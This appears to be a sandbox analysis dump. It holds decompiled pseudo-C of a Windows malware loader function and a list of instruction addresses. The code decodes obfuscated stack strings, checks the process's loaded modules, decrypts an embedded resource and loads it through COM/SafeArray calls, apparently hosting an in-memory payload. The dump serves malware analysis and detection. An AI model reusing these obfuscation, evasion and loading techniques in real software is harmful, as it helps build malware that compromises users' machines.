				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40)); // executed
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543);
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x749acf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
